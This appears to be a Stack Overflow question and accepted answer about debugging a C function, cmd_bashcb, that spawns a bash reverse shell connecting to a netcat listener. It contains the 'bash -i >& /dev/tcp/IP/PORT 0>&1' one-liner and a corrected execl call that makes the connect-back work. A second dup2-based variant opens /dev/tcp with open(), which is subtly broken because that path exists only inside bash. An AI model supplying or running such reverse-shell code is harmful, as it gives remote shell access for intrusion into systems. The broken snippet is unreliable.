# Sending bash connectback issues in C

Tags: c, exec, fork

So I can't seem to figure out what's going on. Every time this function executes, it opens a shell within my current application. It's supposed to be sending a shell to the listening 
`netcat`

I figured the solution would be forking, but I'm getting the same results.

```
void cmd_bashcb(char *ip, int port) {

    if (port > 0 && port < 65536) {

        if (fork() == 0) {
            //char *args[] = {"/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", NULL };
            //execv("/bin/bash", args);
            execl("/bin/bash", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", NULL);
        }
    }
}
```

Really one of those issues I can't seem to figure out

if I execute this CLI, it works like a charm
`bash -i >& /dev/tcp/IP/PORT 0>&1`

Any ideas guys?

Answer (score 1, accepted):

The first argument to `execl()` is the pathname of the executable.  The second argument is the `argv[0]`.  You are telling bash that its name is "`/bin/bash -i >&…`", and since there are no other arguments, it runs as a regular interactive shell connected to the standard I/O channels of the process your code is in.

You need:

```
execl("/bin/bash", "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", (char *)0);
```

This effectively invokes:

```
/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
```

You need the extra level of shell to make the shell handle the I/O redirection.  You could do it yourself and save a shell invocation.

```
int fd = open("/dev/tcp/127.0.0.1/4444", O_RDWR);
dup2(fd, STDIN_FILENO);
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
close(fd);
execl("/bin/bash", "/bin/bash", "-i", (char *)0);
```

Comment: thank you, my nexy step would be getting nano and such to work correctly, Any suggestions

Comment: Not really; you may end up needing to use pseudo-ttys (`/dev/ptX`), which will require you to hunt down the relevant system calls.  That isn't trivial.  I've never needed to do it in anger.